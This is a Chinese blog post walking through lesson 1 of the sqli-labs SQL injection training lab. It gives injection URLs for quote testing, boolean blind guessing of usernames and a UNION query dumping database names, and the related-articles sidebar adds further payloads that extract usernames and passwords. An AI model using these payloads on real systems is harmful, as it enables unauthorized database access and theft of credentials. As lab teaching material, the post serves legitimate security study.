sqli-labs lesson1字符型注入

最新推荐文章于 2025-03-09 18:52:34 发布

原创最新推荐文章于 2025-03-09 18:52:34 发布 · 1k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #sql注入练习

安全专栏收录该内容

1 篇文章

订阅专栏

本文介绍了一种通过SQL注入攻击获取敏感信息的方法。演示了如何利用特定URL参数进行字符串型SQL注入，包括猜解数据库信息、爆出用户名等操作，并提供了两种有效的方式。

1.注入测试

 http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1'

这里写图片描述

http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' or '1'='1

这里写图片描述

http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and '1'='2

这里写图片描述
数字型注入不能使用。考虑猜解,下面也有更好的方法

http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select * from Information_schema)>0 and ''='

这里写图片描述
猜出数据库
爆出用户名

http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select count(*) from users where ascii(mid(username,1,1))=68) and ''='

方法2直接爆出

http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=88888' union select 4,group_concat(schema_name),8 from information_schema.schemata -- and ''='

这里写图片描述

余下步骤见lesson2

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Becivells

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

sqli-labs练习（第一关）——字符型

这是笔者初学时所做的笔记，有错误的地方太多了，有些结论也只是笔者的一家之言。请自行判断

07-17

1639

目录1、判断是数字型还是字符型2、通过报错判断闭合符3、确认查询的字段数量4、确认占位信息5、找库名6、查表名7、找表字段8、找用户名和密码首先，进入靶场 1、判断是数字型还是字符型 在url后面分别添加?id=1, ?id=2, ?id=2-1 ，观察页面的变化，判断是字符型还是数字型。（如果id=2-1 与 id=1的页面一样，就是数字型；如果id=2-1与id=2的页面一样，就是字符型） http://172.16.11.222/sqli-labs/Less-1/?id=1 发现它是字符型。

SQL注入：sqli-labs lesson-1 小白详解

Zeker62的博客

07-22

775

为什么是小白详解？因为我就是小白 SQL注入早有耳闻，今天算是真正打开这个门了，但是想要跨进去应该还是没有那么容易。在B站上听了40分钟的网课，老实说，他讲的还不错，第一遍听不懂也正常 https://www.bilibili.com/video/BV1Q54y1D7VV?p=4 感谢博客园博客带我入门：https://www.cnblogs.com/peterpan0707007/p/7620048.html 每一个带我学习的博客、视频都值得感谢工具准备：浏览器插件：hack bar（免费版的

参与评论您还未登录，请先登录后发表或查看评论

SQLi-Labs Lesson 1-8 notes

乐枕的家

11-21

913

SQLI-LABS 是一个专业的SQL注入练习平台，用于学习SQL注入的各种姿势及原理。 info下面的测试场景都支持GET和POST两种注入方式报错注入(联合查询) 1)字符型 2)数字型报错注入(基于二次注入) 盲注 1)基于布尔值 2)基于时间 UPDATE型注入练习 INSERT型注入练 HTTP头部注入 1)基于Referer 2)基于UserAgent 3)基于Cook

sqli-labs Lesson-1详细过程

Brad_的博客

10-15

729

sqli-labs Lesson-1 根据网上已有教程做得更细化了一些，希望大家共同学习，有错误还望指正。（个人OneNote复制过来为图片）

iwebsec sql字符型注入

Enrich_Life的博客

10-31

300

我们这里利用的是mysql的一个特性，mysql在使用GBK编码的时候，会认为两个字节是一个汉字（前一个ascii码要大于128，才到汉字范围）因为gbk是多字节编码，它认为两个字节代表一个字符，所以%df和后面的%5c变成了汉字 “運” ，而 ’ 逃逸了出来。mysql如何判断一个字符是不是一个汉字，根据gbk编码，第一个字节的ascii码大于128，基本上就行。不一定要使用 %df ，使用 a5 也可以，a5 的 ascii 大于 128。函数会对引号进行转义，使用宽字节注入即可。

sqli-labs lesson 11-15 通关解析学习sql注入

weixin_44286136的博客

05-19

425

lesson 11

Sqli-labs 1-20

最新发布

2301_80024722的博客

03-09

930

【代码】Sqli-labs 1-20。

sqli-labs less11 POST注入-字符型

qq_51550750的博客

03-23

1059

sqli-labs less11 POST注入注入工具：burp (1)判断类型： burp抓包，看到传参admin，是可以正常显示的： and 1 = 1 异常，估计不是数字型尝试单引号：报错了，好征兆 and 1=1 --+ and 1 = 2 --+ 由此，断定这个字符型 的闭合就是’ (2)判断字段个数： order by 1回显正常 order by 2回显正常 order by 3回显错误判断字段个数是2个（3）判断回显位置：显然，两个回显位置都可以（4）爆数

Sqli-labs-master靶场安装及Less-1闯关步骤

tangtang_888的博客

06-30

1575

Sqli-labs-master靶场安装1、将下载好的sqli-labs-master压缩包解压到phpstudy的网站根目录中（可以适当缩短文件名用来方便访问） 2、修改sql-connections文件夹中的配置文件db-creds.inc，将用户名和密码改为自己PHPstudy中mysql数据库的用户名和密码。 3、在浏览器中输入127.0.0.1/sqli-labs(此处sqli-labs为自己设置的文件夹名称)访问sqli-labs靶场并点击Setup/reset Database for lab

SQLi-Labs系列之GET型报错注入

ChuMeng1999的博客

10-28

480

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer，一次性安装，无须配置即可使用，是非常方便、好用的PHP调试环境。

sqli-labs lesson 1-4通关解析学习sql注入

weixin_44286136的博客

05-19

280

lesson 1 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201207164538455.png = 200x150) ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201207164538455.png width=“20%”) 判断是否存在sql注入漏洞

iwebsec靶场SQL注入漏洞-字符型注入

qq_56041380的博客

03-23

827

字符型注入就是注入点的数据类型是字符型。字符型注入与数字型注入的区别就是字符型注入要用一对单引号引起来。

iwebsec sql注入篇(详细过程，完结)

qq_60829702的博客

03-19

3947

iwebsec靶场，SQL注入篇，详细过程，全篇完结

iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入（宽字节注入）

mooyuan的网络安全博客

11-26

3858

打开靶场，url为id=1如下所示本次渗透的关卡为字符型注入，其实总结来讲本关卡的难度相对而言作为第二关有些难度。通过源码再来分析下SQL注入重点内容：（1）闭合方式是什么？iwebsec的第02关关卡为字符型，闭合方式为单引号（2）注入类别是什么？这部分是宽字节型注入，需要使用%df（3）是否过滤了关键字？很明显通过源码，iwebsec的字符型关卡无过滤任何信息。

如何判断是字符型注入还是整形注入

欢迎光临

11-25

7490

1、数字型注入当输入的参数为整形时，如果存在注入漏洞，可以认为是数字型注入。测试步骤：（1）加单引号，URL：www.text.com/text.php?id=3’ 对应的sql：select * from table where id=3’ 这时sql语句出错，程序无法正常从数据库中查询出数据，就会抛出异常；（2）加and 1=1 ,URL：www.text.com/tex...

CTF学习笔记5：iwebsec-SQL注入漏洞-03-bool注入

lvx++的博客

01-22

1510

一、解题过程（一）观察payload与结果 1.SQL执行有结果，就输出welcome to iwebsec!!! 2.否则输出1 （二）编写脚本逐项获取信息 1.获取数据库名字符串长度先要为python安装requests包 pip install requests python代码如下： #encoding=utf-8 import requests import os url="http://192.168.182.130:8001/sqli/03.php" def DbLen():

CTF学习笔记4：iwebsec-SQL注入漏洞-02-字符型注入

lvx++的博客

01-22

1046

一、直接上payload 方法：宽字节注入 ?id=-1%df' union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+ 或 ?id=-1%df%5c%27 union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+ 二、源码分析（一）查看源文件 addslashes()是PHP函

SQL注入之字符型、数字型注入原理及注入步骤(sqli-labs-master 1-2关)

qiqi_w的博客

11-27

6675

SQL注入之字符型、数字型注入原理及注入步骤 sqli-labs-master 1-2关演示截图

sql-labs数字型、字符型注入

m0_63510587的博客

02-16

4104

访问SQLi-Labs网站一、数字型注入 1、访问less-2 访问后根据提示先给定一个GET参数 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 此时页面显示id=1的用户名和密码 2、寻找注入点、判断注入类型 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >>

sqli-labs靶场：掌握SQL注入渗透测试技巧

sqli-labs是一个面向初学者和中级渗透测试人员的SQL注入练习平台，它提供了不同难度级别的练习场景，用户可以在这些场景中尝试使用各种SQL注入技巧。在开始使用sqli-labs之前，用户需要具备一定的Web应用结构知识、...